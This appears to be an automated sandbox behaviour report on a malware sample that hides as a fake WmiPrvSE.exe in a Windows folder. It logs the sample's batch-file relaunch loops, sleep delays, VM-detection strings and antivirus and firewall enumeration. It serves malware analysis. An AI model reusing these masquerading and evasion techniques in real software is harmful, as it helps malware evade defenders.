Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7232	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 4444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 6360	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 1772	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 8052	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7876	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 5100	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: WmiPrvSE.exe, 00000020.00000002.2373276367.000000001C86F000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2767742882.000000001BAA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH=u
Source: WmiPrvSE.exe, 00000039.00000002.2985135868.000000001C680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: WmiPrvSE.exe, 00000014.00000002.2135913069.000000001BA10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: WmiPrvSE.exe, 00000020.00000002.2373276367.000000001C8BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000025.00000002.2364180244.0000021E0F969000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: WmiPrvSE.exe, 00000005.00000002.1855922939.00000000008F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: WmiPrvSE.exe, 00000020.00000002.2377306205.000000001C93C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: WmiPrvSE.exe, 00000026.00000002.2480909854.000000001C437000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3:W;
Source: w32tm.exe, 00000038.00000002.2730116789.00000283BE0D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: WmiPrvSE.exe, 0000001A.00000002.2248061737.000000001B4FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: w32tm.exe, 00000004.00000002.1815836551.0000015461707000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.2075596491.000000001BA0D000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.2039099015.000001DCC15E7000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000019.00000002.2136654662.000001FCF56F9000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2605516166.000000001BBDD000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2779088116.000000000113B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: qLBhpsNtheWbwIdhOeZ.exe0.0.dr	Binary or memory string: sHivMcIRye
Source: WmiPrvSE.exe, 00000014.00000002.2140937679.000000001CAB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grDS520PRI.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Queries volume information: C:\Users\user\Desktop\9D7RwuJrth.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: WmiPrvSE.exe, 0000000E.00000002.2075596491.000000001BA0D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.2078316070.000000001C268000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1987771230.0000000001286000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2140937679.000000001CA44000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2366104209.000000001B8A5000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2480909854.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2476107167.000000001BB9B000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2605516166.000000001BBDD000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2757263786.000000001B295000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2976792819.000000001B6F0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
